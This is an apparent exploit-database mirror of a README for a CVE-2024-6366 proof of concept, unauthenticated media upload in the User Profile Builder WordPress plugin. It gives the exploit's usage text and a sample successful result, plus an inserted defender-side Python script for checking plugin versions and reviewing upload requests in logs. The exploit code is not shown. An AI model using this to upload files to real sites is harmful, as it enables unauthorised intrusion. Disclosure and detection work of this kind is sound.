## https://sploitus.com/exploit?id=1B3C3485-4096-57B5-B45C-369A6E7F70B1
# CVE-2024-6366-PoC
User Profile Builder <= 3.11.7 - Unauthenticated Media Upload
# Description
The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.
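A defender-side check for the condition described above, added here as an example that is not part of the original PoC repository: it reads the installed plugin version from disk and lists POSTs to the upload endpoint in an access log for review. The plugin directory `profile-builder`, the endpoint path `/wp-admin/async-upload.php`, the function names and the sample log lines are assumptions or constructed values.

```python
import re
from pathlib import Path

FIXED = (3, 11, 8)  # first fixed release, per the description
PLUGIN_DIR = "wp-content/plugins/profile-builder"  # assumed plugin slug
ENDPOINT = "/wp-admin/async-upload.php"  # assumed path of WP's async upload handler
HEADER = r"^[ \t/*#@]*%s:\s*(.+)$"  # plugin header line inside a PHP comment
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "POST (\S+) [^"]*" (\d{3}) ')

SAMPLE_LOG = [  # constructed lines in combined log format
    '198.51.100.7 - - [10/Feb/2025:09:14:02 +0000] "POST /wordpress/wp-admin/async-upload.php HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '192.0.2.10 - - [10/Feb/2025:09:15:40 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Feb/2025:09:16:00 +0000] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

def parse_version(text):
    """Turn '3.11.7' into (3, 11, 7); anything after the third number is ignored."""
    return tuple(int(n) for n in re.findall(r"\d+", text)[:3])

def installed_version(wp_root):
    """Find the top-level PHP file carrying a 'Plugin Name:' header and
    return its 'Version:' header as a tuple, or None if no such file exists."""
    for php in sorted(Path(wp_root, PLUGIN_DIR).glob("*.php")):
        head = php.read_text(errors="replace")[:8192]
        if re.search(HEADER % "Plugin Name", head, re.M | re.I):
            m = re.search(HEADER % "Version", head, re.M | re.I)
            if m:
                return parse_version(m.group(1))
    return None

def is_vulnerable(version):
    """True when the installed version predates the fixed release."""
    return version is not None and version < FIXED

def upload_posts(log_lines, endpoint=ENDPOINT):
    """Return (client, timestamp, status) for every POST to the upload endpoint.
    Access logs do not show login state, so each hit needs manual review."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group(3).split("?")[0].endswith(endpoint):
            hits.append((m.group(1), m.group(2), int(m.group(4))))
    return hits

if __name__ == "__main__":
    print("vulnerable:", is_vulnerable(installed_version(".")))
    for hit in upload_posts(SAMPLE_LOG):
        print("review:", hit)
```

Run it from the WordPress root. A hit in the log is only a lead: correlate it with new files under `wp-content/uploads` and with whether the client held a session at that time.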
## Usage:
```
usage: CVE-2024-6366.py [-h] -u URL

The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation,
allowing unauthenticated users to upload media files via the async upload functionality of WP.

options:
  -h, --help         show this help message and exit
  -u URL, --url URL  The target URL (e.g., http://example.com)
```
### Result
```
Extracted URL from the response:
http:\/\/192.168.100.74:888\/wordpress\/wp-content\/uploads\/2025\/02\/Nxploit-8.png
```
### Disclaimer
This script is intended for educational purposes and authorized security assessments only. Misuse of this script may result in legal consequences. Always obtain proper authorization before testing on any system.